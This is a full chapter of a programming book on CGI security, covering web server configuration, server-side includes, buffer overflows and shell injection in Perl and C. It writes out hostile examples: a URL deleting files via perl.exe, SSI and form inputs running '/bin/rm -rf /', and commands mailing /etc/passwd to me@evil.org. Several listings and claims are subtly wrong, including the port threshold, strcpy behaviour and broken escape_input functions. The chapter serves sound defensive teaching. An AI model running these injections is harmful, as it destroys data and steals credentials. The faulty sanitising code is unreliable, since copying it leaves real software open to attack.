All Categories :
CGI & PERL
Chapter 9
CGI Security
CONTENTS
Unless you've programmed network software
in the past, security has probably been the least of your programming
concerns. After all, you don't need to worry about writing insecure
programs on a single-user machine because, presumably, only one
person has access to the machine anyway.
However, programming software designed for use over the Internet
requires a different paradigm of programming with a much greater
emphasis on security. There's an old computer maxim that says
the only way to truly secure a computer is to disconnect it from
the rest of the world and keep it in a locked room. Simply connecting
the machine to a network weakens your machine's security.
This especially holds true for a large scale "network of
networks" like the Internet, where literally millions of
people potentially have access to your computer. Many of the services
over the Internet-especially the World Wide Web-were designed
so that other people could easily access information from your
computer. Each of these services you make available (either consciously
or inadvertently) is another possible door for a wily, malicious
user to exploit. A badly written network server can be easily
intruded, potentially giving someone access to your entire machine
and your important data.
What do I mean when I say that every network service you provide
is like another door on your system? What exactly constitutes
a security breach? For all intents and purposes, a security
breach is when a person gains unauthorized access to your
machine. "Unauthorized access" can mean many things
ranging from running a program on the server not meant to be publicly
run to obtaining root access on a UNIX machine.
You are largely dependent on the knowledge and carefulness of
the programmers who wrote the network servers for security. After
all, one cannot expect you to have to carefully sift through thousands
of lines of source code simply to make sure there are no security
holes in the software; for the most part, you depend on the reliability
of the programmer and other experts who have sifted through source
code and carefully tested the software. While past incidents such
as the Internet Worm have demonstrated that you cannot completely
trust programmers to write perfectly secure code, you can take
steps to minimize the risk.
Later, in "Securing Your Web Server," you learn Web
server security. For the moment, assume your Web server software
is secure and properly configured; that is, no one can gain unauthorized
access to your machine through your Web server alone. Why is it
important to write secure CGI scripts? CGI is a generic protocol
that enables you to extend the Web server. By writing a CGI program,
you are adding functionality to the Web server, functionality
that might inadvertently introduce new security holes. A carelessly
written CGI application can allow anyone full access to your machine.
When users submit a form or access a CGI script in another manner,
you are essentially allowing them to run an application remotely
on your machine. Because many CGI applications accept some form
of user input (either through a fill-out form or from the command
line), to some extent you are allowing users to control how the
CGI application is run. As a CGI author, you need to make sure
that your CGI script can be used only for its specified purpose.
This chapter goes over related Web-security issues and provides
in-depth information on writing secure CGI programs. At the end
of this chapter, you also learn how to write CGI for secure transactions.
Overall security of your Web serving machine depends on many factors.
A secure CGI program is useless if your server is misconfigured
or if there are other holes on your system. I discuss some of
the related Web security issues here and explain how to properly
configure your Web server for CGI.
A common question is which platform is more secure for a Web server:
a Macintosh running System 7, a UNIX workstation, a PC running
OS/2, and so on. There have been many wars on this topic, each
of which reflects people's different biases toward different operating
systems.
No operating system is clearly more secure than another. UNIX
is arguably more secure than a single-user platform such as a
Macintosh or a PC running Windows, because once a user breaks
into one of these latter machines, he or she has access to all
your files. UNIX, however, has a fundamental understanding of
file ownerships and permissions. If your server is configured
correctly and is owned by a safe (for example, non-root) user,
then if someone unauthorized breaks in, he or she can do only
limited damage. Limited damage, however, can be bad enough, as
you will see in the examples later in this chapter.
On the other hand, because UNIX often comes preconfigured with
many different types of network services such as mail, FTP, Gopher,
WWW, and so on, there are more potential "doors" for
someone to enter. Securing all of these services is a difficult
and time-consuming process, even for the experienced administrator.
Even if you configure everything correctly, you are still at the
mercy of possible bugs in each individual package. Security flaws
in various packages are not uncommon, as is clear from the frequency
of notices of insecurities in various common UNIX network services
from organizations such as the Computer Emergency Response Team
(CERT).
Every different platform has its own different security implications,
but one is not more secure than another. Although you should be
aware of the implications of each operating system, it should
not be your primary criteria when choosing a platform. Choose
your platform, seal off the holes associated with that platform,
and then configure your Web server securely and correctly. Only
after you have completed these steps should you concern yourself
with writing secure CGI scripts.
The first step in writing secure CGI scripts is to make sure your
Web server is securely and properly configured. If your Web server
is not secure, it does not matter how carefully you write your
CGI scripts; people can still break into your machine. Additionally,
configuring your Web server correctly helps minimize the potential
damage of a badly written CGI program.
Choosing a Secure Web Server |
There are a countless number of Web servers available for a variety of platforms, and deciding which product is secure or not is a difficult if not impossible task. As with any product, you will need to rely on company reputation and word-of-mouth.
Examine your options. After you have a list of Web servers, look at how long each product has been available and how many people currently use it. The older and more frequently used the Web server, the more likely security bugs have been found and fixed. If the code is freely available and if you have some time and expertise, look through the source code yourself and see if you can find a potential hole. Read what people on the various Web Usenet newsgroups have to say about each product and its authors or publishers. Reputable companies or authors will inform their users immediately about any problems with their product. Read the various security alerts from organizations such as CERT and CIAC (Computer Incident Advisory Capability).
Examine the feature-set and determine whether you really need all of the features. The more complex and powerful the server, the more likely there is an undetected security hole. Make sure your server supports logging so you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be prepared to quickly upgrade or replace your Web server if a security hole is discovered. Pay attention to news releases and the newsgroups for information regarding your Web server. Try to use the latest non-beta version of the Web server.
Don't be afraid of the free servers. There is debate over whether providing source code makes a server more or less secure. If the server source is not available, security holes are more difficult to discover. If the source is available, however, then theoretically holes can be discovered, announced, and patched quickly.
|
You should have three goals when securing your Web server:
- Configure your programs to do only what
you want them to do, nothing more.
- Don't reveal any more information than
necessary.
- Minimize the potential damage if someone
breaks in.
The more I know about your computer, the better equipped I am
to break into it. For example, if I know in which directory or
folder all of your sensitive, private information was stored,
I have narrowed my objective from gaining total access to your
machine to simply gaining access to a directory, usually a simpler
task. Or if I had access to your server configuration files or
source code to your CGI scripts, I could easily browse through
them looking for potential security holes. If there are holes
in your system, you don't want to make it easy for others to know
about them, and you want to find them before others do.
Where Should You Put Your CGI?
As discussed earlier in Chapter 2, "The
Basics," most Web servers enable you to run CGI programs
in many different ways. For example, you could designate a specific
directory as your cgi-bin. Alternatively, you could allow CGI
to be stored in any directory.
There are advantages and disadvantages to both, but from a security
standpoint, it is better to designate one directory to store all
of your CGI applications. Having all of your programs in one directory
makes it easier to keep track of all of the applications on your
server and to audit them for potential security holes. It also
helps prevent tampering. If your scripts are located in several
different directories, you need to constantly check each one of
these for tampering.
If you tend to use a scripting language (such as Perl) for most
of your applications, then the source code is contained within
the application itself. This code, then, is potentially vulnerable
to being read, and exploited, if you're not careful. For example,
many text editors save backup files, usually appending some extension
to the end of the filename (such as .bak).
For example, emacs saves backup files with the extension filename~.
Suppose that you have a CGI script written in Perl-program.cgi-stored
in one of the Web data directories rather than in a central designated
directory. Now suppose that you made a trivial change to the program
using emacs and forgot to remove the backup file. You now have
two files in your directory: program.cgi and program.cgi~. The
Web server knows that files ending in .cgi are CGI programs and
will run the program rather than display its content. However,
a smart user might try to access program.cgi~ instead. Because
it does not end in .cgi, your Web server sends it as a raw text
file, thus allowing the user to search your source code for possible
holes. This violates the first maxim of revealing more information
than necessary.
However, if your server enables you to specify all files located
in a certain directory as a CGI, it doesn't matter what the extension
of the file is. So in the same example earlier, if the backup
file were located in a properly designated directory and a user
tried to access it, the server would try to run the program rather
than send the source code.
Note that designating a central directory as the location of all
CGI programs on your server is limiting, especially on a multiuser
system. For example, if you are an Internet Service Provider and
you want to allow your users to write and run their own CGI, you
might be inclined to allow CGI to be stored in any directory.
Before you do this, consider the alternative options carefully.
Are your clients going to be writing a lot of special customized
scripts? If not, it is better to have your clients submit the
scripts for auditing before being added to the cgi-bin
directory rather than enabling CGI in all directories.
Another issue regarding the location of CGI programs is where
to put the interpreter. For interpreted scripts, the server runs
the interpreter, which in turn loads the script and executes it.
Never put the interpreter in your cgi-bin
directory, or in any directory in your data tree for that matter.
Giving users access to the interpreter essentially gives them
the power to run any application or any series of commands on
your system.
This is especially important if you use a Windows or other non-UNIX
operating system. In UNIX, you can specify the interpreter in
the first line of your script. For example:
#!/usr/local/bin/perl
# this first line says use Perl to run the following script
In Windows, for example, there is no analogous method of specifying
the interpreter within the script. One way to call a Perl script
would be to create a batch file that calls Perl and the script.
rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl
However, you might be inclined to avoid creating this extra program
by simply putting perl.exe in your cgi-bin
directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables anyone in the world to run any
Perl command on your machine. For example, someone could access
the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is equivalent to calling Perl and running
the following one-line program, which will delete all the files
in the current directory. Clearly, this is undesirable.
unlink <*.*>;
You will never have a reason to put an interpreter in your cgi-bin
directory (or any directory capable of running CGI), so never
do it. Some Windows servers can determine the type of script by
its extension and run the appropriate interpreter. For example,
Win-HTTPD assumes every CGI script ending in .pl is a Perl script
and will run Perl automatically. If your Web server does not have
this feature, use a wrapper script like the first Windows Perl
example earlier in this chapter.
Should I Use an Interpreter? |
You should never even be tempted to put an interpreter in your cgi-bin if you are using a UNIX or Macintosh Web server. As noted earlier, UNIX enables you to specify the location of the interpreter within the script. To enable scripts on a Macintosh, you associate the script with the appropriate interpreter by editing the resource using a utility such as ResEdit.
|
Server-Side Includes
In Chapter 4, "Output," you learned
a few reasons why you should avoid server-side includes. A common
reason often raised is security. Specifically, some implementations
of server-side includes (notably NCSA and Netscape) enable users
to embed the output of programs in an HTML document. Every time
one of these HTML files is accessed, the program is run on the
server-side and the output is displayed as part of the HTML document.
By allowing this sort of server-side include, you become susceptible
to a few potential security risks. First, on a UNIX machine, the
programs are run by the owner of the server, not the owner of
the program. If your server isn't properly configured and you
have sensitive files or programs owned by the server owner, these
files and programs and their output become accessible by users
on your machine.
This risk increases if you allow users to edit HTML files on your
system from Web browsers. A common example of this is a guestbook.
In a guestbook, users fill out a form and submit messages to a
CGI program, which will often simply append the unedited message
to an HTML file, the guestbook. By not editing or filtering the
submitted message, you allow the user to submit HTML code from
his or her browser. If you allow programs to be executed in a
server-side include, a malicious user can wreak havoc to your
machine by submitting a tag like the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will attempt to delete everything it
can on your machine.
Note that you could have prevented this problem in several ways
without having to completely turn off server-side includes. You
could have filtered out all HTML tags before appending the submitted
text to your guestbook. Or you could have disabled the exec
capability of your server-side include (I show you how to do this
for the NCSA server later in this chapter in "Example: Securely
Configuring the NCSA Server").
If you forgot to do either of these things, other precautions
you should have taken would have greatly minimized the damage
on your machine by such a tag anyway. For example, as long as
your server was running as a nonexistent, non-root user, this
tag would most likely not have deleted anything of any importance,
perhaps nothing at all. Suppose that instead of attempting to
delete everything on your disks, the malicious user attempted
to obtain your /etc/passwd
for hopeful cracking purposes using something like the following:
<!--#exec cmd="/bin/mail me@evil.org
< /etc/passwd"-->
However, if your system was using the shadow password suite, then
your /etc/passwd has no useful
information to potential hackers.
This example demonstrates two important things about both server-side
includes and CGI in general. First, security holes can be completely
hidden. Who would have thought that a simple guestbook program
on a system with server-side includes posed a large security risk?
Second, the potential damage of an inadvertent security hole can
be greatly minimized by carefully configuring your server and
securing your machine as a whole.
Although server-side includes add another potentially useful dimension
to your Web server, think carefully about the potential risks,
as well. In Chapter 4, I offer several
alternatives to using server-side includes. Unless you absolutely
need to use server-side includes, you might as well disable them
and close off a potential security hole.
Securing Your UNIX Web Server
A secured UNIX system is a powerful platform for serving Web documents.
However, there are many complex issues associated with securing
and properly configuring a UNIX Web server. The very first thing
you should do is make sure your machine is as secure as possible.
Disable network services you don't need, no matter how harmless
you think they are. It is highly unlikely that anyone can break
into your machine using the finger
protocol, for example, which only answers queries about users.
However, finger can give
hackers useful information about your system.
Secure your system internally. If a hacker manages to break into
one user's account, make sure the hacker cannot gain any additional
privileges. Useful actions include installing a shadow password
suite and removing all setuid scripts (scripts that are set to
run as the owner of the script, even if called by another user).
Securing a UNIX machine is a complex topic and goes beyond the
scope of this book. I highly recommend that you purchase a book
on the topic, read the resources available on the Internet, even
hire a consultant if necessary. Don't underestimate the importance
of securing your machine.
Next, allot separate space for your Web server and document files.
The intent of your document directories is to serve these files
to other people, possibly to the rest of the world, so don't put
anything in these directories that you wouldn't want anyone else
to see. Your server directories contain important log and configuration
information. You definitely do not want outside users to see this
information, and you most likely don't want most of your internal
users to see it or write to it either.
Set the ownership and permissions of your directories and server
wisely. It's common practice to create a new user and group specifically
to own Web-related directories. Make sure nonprivileged users
cannot write to the server or document directories.
Your server should never be "running as root." This
is a misleading statement. In UNIX, only root can access ports
less than 1234. Because by default Web servers run on port 80,
you need to be root to start a Web server. However, after the
Web server is started as root, it can either change its own process's
ownership (if it's internally threaded) or change the ownership
of its child processes that handle connections (if it's a forking
server). Either method allows the server to process requests as
a non-root user. Make sure you configure your Web server to "run
as non-root," preferably as a completely nonexistent user
such as "nobody." This limits the potential damage if
you have a security hole in either your server or your CGI program.
Disable all features unless you absolutely need them. If you initially
disable a feature and then later decide you want to use it, you
can always turn it back on. Features you might want to disable
include server-side includes and serving symbolic links.
If your users don't need to serve their personal Web documents
from your server, disable public Web directories. This enables
you to have complete and central control over all documents served
from your machine, an important quality for general maintenance
and security.
If your users do need to serve their personal documents (for example,
if you are an Internet Access Provider), make sure they cannot
override your main configuration. Seriously consider whether users
need the ability to run CGI programs from their own personal directories.
As stated earlier, it's preferable to store all CGI in one centralized
location.
CGIWRAP |
A popular package available on the Web is cgiwrap, written by Nathan Neulinger nneul@umr.edu. This package enables users to run their own CGI programs by running the program as the owner of the program rather than the owner of the server.
It's not clear whether this is more or less beneficial than simply allowing anyone to run his or her own CGI programs unwrapped. On one hand, a bad CGI script has the capability to do less damage owned by nobody rather than by a user who actually exists. On the other hand, if the CGI program does damage the system as nobody, the responsibility lies on the system administrator, whereas if only a specific user's files were damaged, it would ultimately be the user's responsibility.
My advice would be to not go with either option and simply disallow unaudited user CGI programs. If this is unacceptable, then ultimately whether you use cgiwrap or a similar program depends on where you want the responsibility to lie.
|
Finally, you might want to consider setting up a chroot
environment for your Web documents. In UNIX, you can protect a
directory tree by using chroot.
A server running inside of a chrooted
directory cannot see anything outside of that directory tree.
Under a chrooted environment,
if someone manages to break in through your Web server, they can
damage files only within that directory tree.
Note, however, that a chrooted
environment is appropriate only for a Web server serving a single
source of documents. If your Web server is serving users' documents
in multiple directories, it is nearly impossible to set up an
effective chrooted environment.
Additionally, a chrooted
environment is weakened by the existence of interpreters (such
as Perl or a shell). In a chrooted
environment without any shells or interpreters, someone who has
broken in can at worst change or damage your files; with an interpreter,
potential damage increases.
Example: Securely Configuring the NCSA Server
I'll demonstrate how one might go about properly configuring a
common Web server on a UNIX environment by discussing the NCSA
Server (v1.4.2). There are many Web servers available for UNIX,
but NCSA is one of the oldest, is commonly used, is freely available,
and is fairly easy to configure. I will demonstrate only the configuration
I think is most relevant to securing the Web server; for more
detailed instructions on configuring NCSA httpd, look at its Web
site: URL:http://hoohoo.ncsa.uiuc.edu/.
You can apply the principles demonstrated here to almost any UNIX
Web server.
First, I need to present the criteria. In this scenario, I want
to set up the NCSA server on a secured UNIX machine for a small
Internet service provider called MyCompany. The machine's host
name is www.mycompany.net.
I want everyone with an account on my machine to be able to serve
his or her own Web documents and possibly use CGI or other features.
What features do I absolutely need? In this case, because I'm
a small Internet service provider, I will not let users serve
their own CGI. If they want to write and use their own CGI programs,
they must submit it to me for auditing; if it's okay, I'll install
it. Additionally, I'll provide general programs that are commonly
requested, such as guestbooks and generic form-processing applications.
I don't need any other features for now in this scenario, including
server-side includes.
Here is how I'm going to configure my Web server. I will create
the user and group www; these
will own all of the appropriate directories. I will create one
directory for my server files (/usr/local/etc/httpd/)
and one directory for the Web documents (/usr/local/etc/httpd/htdocs/).
Both directory trees will be world readable and user and group
writeable.
Now, I'm ready to configure the server. NCSA httpd has three configuration
files: access.conf, httpd.conf, and srm.conf. First, you need
to tell httpd where your server and HTML directories are located.
In httpd.conf, specify the server directory with the following
line:
ServerRoot /usr/local/etc/httpd
In srm.conf, specify the document directory with
DocumentRoot /usr/local/etc/httpd/htdocs
Because I want to designate all files in /usr/local/etc/httpd/cgi-bin
as CGI programs, I include the following line in srm.conf:
ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin
Note that the actual location of my cgi-bin
directory is not in my document tree but in my server tree. Because
I want to keep my server directory (including the directory containing
the CGI) as private as possible, I keep it outside of the document
directory. If I have a CGI in this directory called mail.cgi,
I can access it by using the URL
http://www.mycompany.net/cgi-bin/mail.cgi
One other line in srm.conf needs to be edited; it's not particularly
relevant to our specific quest of securing the server, but for
completeness sake, I'll mention it anyway:
Alias /icons/ /usr/local/etc/httpd/icons
The Alias directive enables
you to specify an alias for a directory either in or out of your
document directory tree. Unlike the ScriptAlias
directive, Alias does not
change the meaning of the directory in any other way.
Because I want to disable server-side includes and not allow CGI
in any directory other than cgi-bin,
I comment out the lines in srm.conf by inserting a pound sign
(#) in front of the line.
#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi
AddType enables you to associate
MIME types with filename extensions. text/x-server-parsed-html
is the MIME type for parsed HTML (for example, HTML with embedded
tags for server-side includes) whereas application/x-httpd-cgi
is the type for CGI applications. I don't need to specify the
extension for this MIME type in this case because I've configured
the server to assume that everything in the cgi-bin,
regardless of filename extension, is a CGI.
Finally, I need to set properties and access restrictions to certain
directories by editing the global access.conf file. To define
global parameters for all the directories, simply put the directives
in the file without any surrounding tags. In order to specify
parameters for specific directories, surround the directives with
<Directory directoryname>
tags, where directoryname is
the full path of the directory.
By default, the following global options are set:
Options Indexes FollowSymLinks
Indexes enables you to specify
a file to look for if a directory is specified in the URL without
a filename. By default, this variable, specified by DirectoryIndex
in srm.conf, is set to index.html,
which is fine for my purposes. FollowSymLinks
means that the server will return the data to which the symbolic
link is pointing. I see no need for this feature, so I'll disable
it. Now, this line looks like the following:
Options Indexes
If I want to allow CGI programs in any directory, I could set
that by including the option ExecCGI.
Options Indexes ExecCGI
This line, along with the AddType
directive in srm.conf, would allow me to run a CGI in any directory
by adding the extension .cgi to all CGI programs.
By default, NCSA httpd is configured so that all of the settings
in access.conf can be overridden by creating an .htaccess file
in the specific directory with the appropriate properties and
access restrictions. In this case, I don't mind if users change
their own access restrictions. However, I don't want users to
give themselves the ability to run CGI in their directories by
including the .htaccess file.
AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI
Therefore, I edit access.conf to allow the user to override all
settings except for Options.
AllowOverride FileInfo AuthConfig Limit
My server is now securely configured. I have disallowed CGI in
all but the cgi-bin directory,
and I've completely disallowed server-side includes. The server
runs as user nobody, a non-
existent user on my system. I've disabled all features I don't
need, and users cannot override these important restrictions.
For more information on the many other configurations, including
detailed access restrictions, refer to the NCSA server documentation.
At this point, you have presumably secured your machine and your
Web server. You are finally ready to learn how to write a secure
CGI program. The basic principles for writing secure CGI are similar
to the ones outlined earlier:
- Your program should do what you want and
nothing more.
- Don't give the client more information
than it needs to know.
- Don't trust the client to give you the
proper information.
I've already demonstrated the potential danger of the first principle
with the guestbook example. I present a few other common mistakes
that can open up holes, but you need to remember to consider all
of the implications of every function you write or use.
The second principle is simply an extension of a general security
principle: the less the outside world knows about the inside of
your system, the less-equipped outsiders are to break in.
This last principle is not just a good programming rule of thumb
but a good security one, as well. CGI programs should be robust.
One of the first things a hacker will try to do to break into
a machine through a CGI program is to try to confuse it by experimenting
with the input. If your program is not robust, it will either
crash or do something it was not designed to do. Both possibilities
are undesirable. To combat this possibility, don't make any assumptions
about the format of the information or the values the client will
send.
The most barebone CGI program is a simple input/output program.
It takes what the client tells it and returns some response. Such
a program offers very little risk (although possible holes still
exist, as you will later see). Because the CGI program is not
doing anything interesting with the input, nothing wrong is likely
to happen. However, once your program starts manipulating the
input, possibly calling other programs, writing files, or doing
anything more powerful than simply returning some output, you
risk introducing a security hole. As usual, power is directly
proportional to security risk.
Different languages have different inherent security risks. Secure
CGI programs can be written in any language, but you need to be
aware of each language's quirks. I discuss only C and Perl here,
but some of the traits can be generalized to other languages.
For more specific information on other languages, refer to the
appropriate documentation.
Earlier in this chapter you learned that in general, compiled
CGI programs are preferable to interpreted scripts. Compiled programs
have two advantages: first, you don't need to have an interpreter
accessible to the server, and second, source code is not available.
Note that some traditionally interpreted languages such as Perl
can be compiled into a binary. (For information on how to do this
in Perl, consult Larry Wall and Randall Schwartz's Programming
Perl published by O'Reilly and Associates). From a security
standpoint, a compiled Perl program is just as good as a compiled
C program.
Lower-level languages such as C suffer from a problem called a
buffer overflow. C doesn't have a good built-in method
of dealing with strings. The traditional method is to declare
either an array of characters or a pointer to a character. Many
have a tendency to use the former method because it is easier
to program. Consider the two equivalent excerpts of code in Listings
9.1 and 9.2.
Listing 9.1. Defining a string using an array in C.
#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char buffer[80];
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
Listing 9.2. Defining a string using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char *buffer = malloc(sizeof(char) * (strlen(message)
+ 1));
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
Listing 9.1 is much simpler than Listing 9.2, and in this specific
example, both work fine. This is a contrived example; I already
know the length of the string I am dealing with, and consequently,
I can define the appropriate length array. However, in a CGI program,
you have no idea how long the input string is. If message,
for example, were longer than 80 characters, the code in Listing
9.2 would crash.
This is called a buffer overflow, and smart hackers can
exploit these to remotely execute commands. The buffer overflow
was the bug that afflicted NCSA httpd v1.3. It's a good example
of how and why a network (or CGI) programmer needs to program
with more care. On a single-user machine, a buffer overflow simply
leads to a crash. There is no advantage to executing programs
using a buffer overflow on a crashed single-user machine because
presumably (with the exception of public terminals), you could
have run any program you wanted anyway. However, on a networked
system, a crashed CGI program is more than a nuisance; it's a
potential door for unauthorized users to enter.
The code in Listing 9.2 solves two problems. First, it dynamically
allocates enough memory to store the string. Second, notice that
I added 1 to the length of
the message. I actually allocate enough memory for one more character
than the length of the string. This is to guarantee the string
is null-terminated. The strcpy()
function pads the remainder of the target string with null characters,
and because the target string always has room for one extra character,
strcpy() places a null character
there. There's no reason to assume that the input string sent
to the CGI script ends in a null character, so I place one at
the end just in case.
Provided your C programs avoid problems such as buffer overflows,
you can write secure CGI programs. However, this is a tough provision,
especially for large, more complicated CGI programs. Problems
like this force you to spend more time thinking about low-level
programming tasks rather than the general CGI task. For this reason,
you might prefer to program in a higher-level programming language
(such as Perl) that robustly handles such low-level tasks.
However, there is a flip side to the high-level nature of Perl.
Although you can assume that Perl will properly handle string
allocation for you, there is always the danger that Perl is doing
something in a high-level syntax of which you are not aware. This
will become clearer in the next section on shell dangers.
Many CGI tasks are most easily implemented by running other programs.
For example, if you were to write a CGI mail gateway, it would
be silly to completely reimplement a mail transport agent within
the CGI program. It's much more practical to pipe the data into
an existing mail transport agent such as sendmail and let sendmail
take care of the rest of the work. This practice is fine and is
encouraged.
The security risk depends on how you call these external programs.
There are several functions that do this in both C and Perl. Many
of these functions work by spawning a shell and by having the
shell execute the command. These functions are listed in Table
9.1. If you use one of these functions, you are vulnerable to
weaknesses in UNIX shells.
Table 9.1. Functions in both C and Perl that spawn
a shell.
Perl Functions | C Functions
|
system(' . . . ')
| system()
|
open('| . . . ')
| popen()
|
exec(' . . . ')
| |
eval(' . . . ')
| |
' . . . '
|
|
Why are shells dangerous? There are several nonalphanumeric characters
that are reserved as special characters by the shell. These characters
are called metacharacters and are listed in Table 9.2.
Table 9.2. Shell metacharacters.
; | <
| > | *
| | |
' | &
| $ | !
| # |
( | )
| [ | ]
| : |
{ | }
| ' | "
| |
Each of these metacharacters performs special functions within
the shell. For example, suppose that you wanted to finger a machine
and save the results to a file. From the command line, you might
type:
finger @fake.machine.org > results
This would finger the host fake.machine.org
and save the results to the text file results.
The > character in this
case is a redirection character. If you wanted to actually use
the > character-for example,
if you want to echo it to the screen-you would need to precede
the character with a backslash. For example, the following would
print a greater-than symbol >
to the screen:
echo \>
This is called escaping or sanitizing the character
string.
How can a hacker use this information to his or her advantage?
Observe the finger gateway written in Perl in Listing 9.3. All
this program is doing is allowing the user to specify a user and
a host, and the CGI will finger the user at the host and display
the results.
Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
print '/usr/bin/finger $in{'username'}';
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text
name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
At first glance, this might seem like a harmless finger gateway.
There's no danger of a buffer overflow because it is written in
Perl. I use the complete pathname of the finger binary so the
gateway can't be tricked into using a fake finger program. If
the input is in an improper format, the gateway will return an
error but not one that can be manipulated.
However, what if I try entering the following field (as shown
in Figure 9.1):
Figure 9.1 : Text to manipulate unsafe finger gateway.
nobody@nowhere.org ; /bin/rm -rf /
Work out how the following line will deal with this input:
print `/usr/bin/finger $in{'username'}`;
Because you are using back ticks, first it will spawn a shell.
Then it will execute the following command:
/usr/bin/finger nobody@nowhere.org ;
/bin/rm -rf /
What will this do? Imagine typing this in at the command line.
It will wipe out all of the files and directories it can, starting
from the root directory. We need to sanitize this input to render
the semicolon (;) metacharacter
harmless. In Perl, this is easily achieved with the function listed
in Listing 9.4. (The equivalent function for C is in Listing 9.5;
this function is from the cgihtml C library.)
Listing 9.4. escape_input()
in Perl.
sub escape_input {
@_ =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
return @_;
}
Listing 9.5. escape_input()
in C.
char *escape_input(char *str)
/* takes string and escapes all metacharacters. should be used
before
including string in system() or similar call.
*/
{
int i,j = 0;
char *new = malloc(sizeof(char) * (strlen(str) * 2
+ 1));
for (i = 0; i < strlen(str); i++) {
printf("i = %d; j = %d\n",i,j);
switch (str[i]) {
case '|': case '&': case
';': case '(': case ')': case '<':
case '>': case '\'': case
'"': case '*': case '?': case '\\':
case '[': case ']': case '$':
case '!': case '#': case ';':
case '`': case '{': case '}':
new[j] = '\\';
j++;
break;
default:
break;
}
new[j] = str[i];
j++;
}
new[j] = '\n';
return new;
}
This returns a string with the shell metacharacters preceded by
a backslash. The revised finger.cgi gateway is in Listing 9.6.
Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an safe finger gateway
require 'cgi-lib.pl';
sub escape_input {
@_ =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
return @_;
}
print &PrintHeader;
if (&ReadParse(*in)) {
print "<pre>\n";
print `/usr/bin/finger &escape_input($in{'username'})`;
print "</pre>\n";
}
else {
print "<html> <head>\n";
print "<title>Finger Gateway</title>\n";
print "</head>\n<body>\n";
print "<h1>Finger Gateway</h1>\n";
print "<form method=POST>\n";
print "<p>User@Host: <input type=text
name=\"username\">\n";
print "<p><input type=submit>\n";
print "</form>\n";
print "</body> </html>\n";
}
This time, if you try the same input as the preceding, a shell
is spawned and it tries to execute:
/usr/bin/finger nobody@nowhere.org \;
/bin/rm -rf /
The malicious attempt has been rendered useless. Rather than attempt
to delete all the directories on the file system, it will try
to finger the users nobody@nowhere.org,
;, /bin/rm,
-rf, and /.
It will probably return an error because it is unlikely that the
latter four users exist on your system.
Note a couple of things. First, if your Web server was configured
correctly (for example, running as non-root), the attempt to delete
everything on the file system would have failed. (If the server
was running as root, then the potential damage is limitless. Never
do this!) Additionally, the user would have to assume that the
rm command was in the /bin
directory. He or she could also have assumed that rm
was in the path. However, both of these are pretty reasonable
guesses for the majority of UNIX machines, but they are not global
truths. On a chrooted environment
that did not have the rm
binary located anywhere in the directory tree, the hacker's efforts
would have been a useless endeavor. By properly securing and configuring
the Web server, you can theoretically minimize the potential damage
to almost zero, even with a badly written script.
However, this is no cause to lessen your caution when writing
your CGI programs. In reality, most Web environments are not chrooted,
simply because it prevents the flexibility many people need in
a Web server. Even if one could not remove all the files in a
file system because the server was not running as root, someone
could just as easily try input such as the following, which would
have e-mailed the /etc/passwd
file to me@evil.org for possible
cracking:
nobody@nowhere.org ; /bin/mail me@evil.org
< /etc/passwd
A hacker could do any number of other things by manipulating this
one hole, even in a well-configured environment. If you let a
hole slip past you in a simple CGI program, how can you be sure
you properly and securely configured your complicated UNIX system
and Web server?
The answer is, you can't. Your best bet is to make sure your CGI
programs are secure. Not sanitizing input before running it in
a shell is a simple thing to cure, and yet it is one of the most
common mistakes in CGI programming.
Fortunately, Perl has a good mechanism for catching potentially
tainted variables. If you use taintperl instead of Perl (or perl
-T if you are using Perl 5), the script will exit at points where
potentially tainted variables are passed to a shell command. This
will help you catch all instances of potentially tainted variables
before you actually begin to use your CGI program.
Notice that there are several more functions in Perl that spawn
the shell than there are in C. It is not immediately obvious,
even to the intermediate Perl programmer, that back ticks spawn
a shell before executing the program. This is the alternative
danger of higher-level language; you don't know what security
holes a function might cause because you don't necessarily know
exactly what it does.
You don't need to sanitize the input if you avoid using functions
that spawn shells. In Perl, you can do this with either the system()
or exec() function by enclosing
each argument in separate quotes. For example, the following is
safe without sanitizing $input:
system("/usr/ucb/finger",$input{'username'});
However, in the case of your finger gateway, this feature is useless
because you need to process the output of the finger
command, and there is no way to trap it if you use the system()
function.
In C, you can also execute programs directly by using the exec
class of functions: execv(),
execl(), execvp(),
execlp(), and execle().
execl() would be the C equivalent
of the Perl function system()
with multiple arguments. Which exec
function you use and how you implement it depends on your need;
specifics go beyond the scope of this book.
One aspect of security only briefly discussed earlier is privacy.
A popular CGI application these days tends to be one that collects
credit card information. Data collection is a simple task for
a CGI application, but the collection of sensitive data requires
a secure means of getting the information from the browser to
the server and CGI program.
For example, suppose that I want to sell books over the Internet.
I might set up a Web server with a form that allows customers
to buy books by submitting personal information and a credit card
number. After I have that information, I want to store it on my
machine for company records.
If anyone were to break into my company's machine, that person
would have access to these confidential records containing customer
information and credit card numbers. In order to prevent this,
I would make sure the machine is configured securely and that
my CGI script that accepts form input is written correctly so
that it cannot be maliciously manipulated. In other words, as
the administrator of the machine and the CGI programmer, I have
a lot of control over the first problem: preventing information
from being stolen directly from my machine.
